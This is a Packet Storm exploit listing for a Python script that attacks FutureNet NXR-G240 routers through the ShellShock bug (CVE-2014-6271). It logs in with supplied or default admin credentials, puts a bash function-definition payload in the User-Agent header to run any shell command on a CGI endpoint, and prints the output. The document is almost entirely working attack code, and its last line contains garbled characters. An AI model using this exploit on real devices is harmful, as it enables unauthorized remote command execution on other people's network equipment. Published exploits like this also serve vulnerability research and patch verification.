Lucene search

K
packetstormNassim AsrirPACKETSTORM:150687
HistoryDec 07, 2018 - 12:00 a.m.

FutureNet NXR-G240 Series ShellShock Command Injection

2018-12-0700:00:00
Nassim Asrir
packetstormsecurity.com
90

0.976 High

EPSS

Percentile

100.0%

`# -*- coding: utf-8 -*-  
# Title: FutureNet NXR-G240 Series - "ShellShock" Remote Command Injection  
# Date: 2018-06-12  
# Author: Nassim Asrir  
# You have a Q ? Contact me at: https://www.linkedin.com/in/nassim-asrir-b73a57122/  
# Vendor: http://www.centurysys.co.jp/  
# CVE: CVE-2014-6271  
# Greetz to : Nadia BENCHIKHA for the great help.  
# Example:  
# [root@parrot]a[/home/sniperpex/Desktop]  
# #python ./exploit.py http://server -u admin -p admin -c ps  
  
import urllib2  
import base64  
import bs4  
import sys  
import argparse  
reload(sys)  
sys.setdefaultencoding('utf8')  
  
ap = argparse.ArgumentParser(description="FutureNet NXR-G240 Series - ShellShock Remote Command Injection ")  
  
ap.add_argument("host", help="(Example: http://127.0.0.1).")  
  
ap.add_argument("-u", "--user", help="Admin username (Default: admin)")  
  
ap.add_argument("-p", "--password", help="Admin password (Default: admin)")  
  
ap.add_argument("-c", "--cmd", help="Command to run.")  
  
args = ap.parse_args()  
  
request = urllib2.Request(args.host+"/cgi-bin/information.cgi?section=arp&module=system&command=execute")  
  
base64string = base64.encodestring('%s:%s' % (args.user, args.password)).replace('\n', '')  
  
print '[+] Authentication & Exploit in progress...'  
  
request.add_header("Authorization", "Basic %s" % base64string)  
  
request.add_header("User-Agent", "() { :;}; /bin/bash -c "+str(args.cmd))  
  
response = urllib2.urlopen(request)  
  
soup = bs4.BeautifulSoup(response, 'html.parser')  
  
for textarea in soup.find_all('pre'):  
  
print textarea.get_text().replace("# ARPaea +-",'').replace("e!"c$?oaSSaa3/4aa",'')  
`